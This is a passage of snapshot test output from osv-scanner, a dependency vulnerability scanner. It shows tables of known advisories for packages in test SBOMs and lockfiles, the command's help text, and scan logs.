testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | 
Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 
7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 
1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl 
| 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 
| -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ --- [TestCommand/folder_of_supported_sbom_with_vulns - 2] --- [TestCommand/gh-annotations_with_vulns - 1] --- [TestCommand/gh-annotations_with_vulns - 2] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
::error file=testdata/locks-many-with-insecure/package-lock.json::testdata/locks-many-with-insecure/package-lock.json%0A+-----------+-------------------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+-----------+-------------------------------------+------+-----------------+---------------+%0A| ansi-html | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | 0.0.1 | 0.0.8 |%0A+-----------+-------------------------------------+------+-----------------+---------------+ --- [TestCommand/go_packages_in_osv-scanner.json_format - 1] Scanned /testdata/locks-insecure/osv-scanner.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 24 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 24 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. 
+------------------------------+------+-----------+-----------+---------+---------------+------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +------------------------------+------+-----------+-----------+---------+---------------+------------------------------------------+ | https://osv.dev/GO-2025-3849 | | Go | stdlib | 1.24.4 | 1.24.6 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-3956 | | Go | stdlib | 1.24.4 | 1.24.6 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4006 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4007 | | Go | stdlib | 1.24.4 | 1.24.9 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4008 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4009 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4010 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4011 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4012 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4013 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4014 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4015 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4155 | | Go | stdlib | 1.24.4 | 1.24.11 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4175 | | Go | stdlib | 1.24.4 | 1.24.11 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4337 | | Go | stdlib | 1.24.4 | 1.24.13 | testdata/locks-insecure/osv-scanner.json | | 
https://osv.dev/GO-2026-4340 | | Go | stdlib | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4341 | | Go | stdlib | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4342 | | Go | stdlib | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4601 | | Go | stdlib | 1.24.4 | 1.25.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4602 | | Go | stdlib | 1.24.4 | 1.25.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4603 | | Go | stdlib | 1.24.4 | 1.25.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-3828 | | Go | toolchain | 1.24.4 | 1.24.5 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4339 | | Go | toolchain | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4433 | | Go | toolchain | 1.24.4 | 1.24.13 | testdata/locks-insecure/osv-scanner.json | +------------------------------+------+-----------+-----------+---------+---------------+------------------------------------------+ --- [TestCommand/go_packages_in_osv-scanner.json_format - 2] --- [TestCommand/help - 1] NAME: osv-scanner source - scans a source project's dependencies for known vulnerabilities using the OSV database. USAGE: osv-scanner source [options] [directory1 directory2...] DESCRIPTION: scans a source project's dependencies for known vulnerabilities using the OSV database. 
OPTIONS: --lockfile string, -L string [ --lockfile string, -L string ] scan package lockfile on this path --sbom string, -S string [ --sbom string, -S string ] [DEPRECATED] scan sbom file on this path, the sbom file name must follow the relevant spec --recursive, -r check subdirectories --no-ignore also scan files that would be ignored by .gitignore --include-git-root include scanning git root (non-submoduled) repositories --experimental-exclude string [ --experimental-exclude string ] exclude directory paths during scanning; use g:pattern for glob, r:pattern for regex, or just dirname for exact match (can be repeated) --data-source string source to fetch package information from; value can be: deps.dev, native (default: "deps.dev") --maven-registry string URL of the default registry to fetch Maven metadata --config string set/override config file --format string, -f string sets the output format; value can be: table, html, vertical, json, markdown, sarif, gh-annotations, cyclonedx-1-4, cyclonedx-1-5, spdx-2-3 (default: "table") --serve output as HTML result and serve it locally --port string port number to use when serving HTML report (default: 8000) --output string [DEPRECATED] (Use "--output-file" instead) saves the result to the given file path --output-file string saves the result to the given file path --verbosity string specify the level of information that should be provided during runtime; value can be: error, warn, info (default: "info") --offline run in offline mode, disabling any features requiring network access --offline-vulnerabilities checks for vulnerabilities using local databases that are already cached --download-offline-databases downloads vulnerability databases for offline comparison --call-analysis string [ --call-analysis string ] Enable call analysis for specific languages (e.g. --call-analysis=go). Supported: go, rust (*). (*) Will run build scripts. 
--no-call-analysis string [ --no-call-analysis string ] disables call graph analysis --no-resolve disable transitive dependency resolution of manifest files --allow-no-lockfiles has the scanner consider no lockfiles being found as ok --all-packages when json output is selected, prints all packages --all-vulns show all vulnerabilities including unimportant and uncalled ones --licenses value report on licenses based on an allowlist --experimental-flag-deprecated-packages report if package versions are deprecated --experimental-plugins string [ --experimental-plugins string ] list of specific plugins and presets of plugins to use (default: "lockfile", "sbom", "directory") --experimental-disable-plugins string [ --experimental-disable-plugins string ] list of specific plugins and presets of plugins to not use --experimental-no-default-plugins disable default plugins, instead using only those enabled by --experimental-plugins --help, -h show help --- [TestCommand/help - 2] --- [TestCommand/ignores_without_reason_should_be_explicitly_called_out - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Packagist/sentry/sdk/2.0.4 has been filtered out because: (no reason given) Filtered 1 ignored package/s from the scan. 
GHSA-whgm-jr23-g3j9 and 1 alias have been filtered out because: (no reason given) Filtered 1 vulnerability from output No issues found --- [TestCommand/ignores_without_reason_should_be_explicitly_called_out - 2] --- [TestCommand/ignoring_.gitignore - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/ignoring_.gitignore - 2] --- [TestCommand/invalid_--verbosity_value - 1] --- [TestCommand/invalid_--verbosity_value - 2] invalid verbosity level "unknown" - must be one of: error, warn, info --- [TestCommand/json_output - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand/json_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/nested_directories_are_checked_when_`--recursive`_is_passed - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/nested_directories_are_checked_when_`--recursive`_is_passed - 2] --- [TestCommand/no_lockfiles_with_allow_flag_but_another_error_happens_is_not_fine - 1] Scanning dir ./testdata/locks-none-does-not-exist --- [TestCommand/no_lockfiles_with_allow_flag_but_another_error_happens_is_not_fine - 2] failed to resolve path: stat /testdata/locks-none-does-not-exist: no such file or directory --- [TestCommand/no_lockfiles_with_recursion_and_with_allow_flag_are_fine - 1] Scanning dir ./testdata/locks-none Scanned /testdata/locks-none/nested/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- 